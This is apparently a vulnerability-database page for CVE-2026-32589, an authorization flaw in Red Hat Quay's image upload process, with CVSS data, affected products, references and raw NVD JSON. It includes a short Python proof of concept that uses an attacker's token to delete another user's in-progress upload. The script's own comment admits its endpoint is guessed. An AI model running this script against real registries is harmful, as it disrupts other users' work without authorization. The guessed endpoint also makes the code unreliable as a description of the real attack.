Security Vulnerability Report
CVE-2026-32589 CVSS 7.4 HIGH

Published: 2026-04-08 18:26:00
Last Modified: 2026-05-20 04:16:50

Description

A flaw was found in Red Hat Quay's container image upload process. An authenticated user with push access to any repository on the registry can interfere with image uploads in progress by other users, including those in repositories they do not have access to. This could allow the attacker to read, modify, or cancel another user's in-progress image upload.

CVSS Details

CVSS Score: 7.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:redhat:mirror_registry_for_red_hat_openshift:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:mirror_registry_for_red_hat_openshift:2.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:quay:3.0.0:*:*:*:*:*:*:* - VULNERABLE
Red Hat Quay (see the vendor security advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
target_url = "https://quay.example.com"
victim_repo = "target_namespace/private_repo"
victim_upload_uuid = "a1b2c3d4-1234-5678-90ab-cdef12345678"  # UUID of the in-progress upload

# Attacker's credentials (User with push access to ANY repo)
attacker_token = "Bearer <valid_auth_token>"

headers = {
    "Authorization": attacker_token,
    "Content-Type": "application/json"
}

# Exploit: Attempt to delete the victim's upload (Denial of Service)
# Endpoint structure based on typical Quay API patterns
delete_url = f"{target_url}/api/v1/repository/{victim_repo}/uploads/{victim_upload_uuid}"

print(f"[*] Attempting to interrupt upload {victim_upload_uuid}...")

try:
    response = requests.delete(delete_url, headers=headers)
    if response.status_code == 204:
        print("[+] Exploit successful: Upload cancelled.")
    elif response.status_code == 403:
        print("[-] Exploit failed: Permission denied (System may be patched).")
    else:
        print(f"[-] Unexpected response: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[!] Error: {e}")

References

https://access.redhat.com/errata/RHSA-2026:19375
https://access.redhat.com/security/cve/CVE-2026-32589 (Vendor Advisory)
https://bugzilla.redhat.com/show_bug.cgi?id=2446963 (Issue Tracking, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32589", "sourceIdentifier": "[email protected]", "published": "2026-04-08T18:25:59.790", "lastModified": "2026-05-20T04:16:49.523", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Red Hat Quay's container image upload process. An authenticated user with push access to any repository on the registry can interfere with image uploads in progress by other users, including those in repositories they do not have access to. This could allow the attacker to read, modify, or cancel another user's in-progress image upload."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 3.7}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:mirror_registry_for_red_hat_openshift:-:*:*:*:*:*:*:*", "matchCriteriaId": "63757310-FC5B-44E6-9211-36269827BC56"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:redhat:mirror_registry_for_red_hat_openshift:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "281E6AA4-1E08-488F-BA7A-F0BE7CF42A5B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:quay:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1987BDA-0113-4603-B9BE-76647EB043F2"}]}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:19375", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-32589", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446963", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}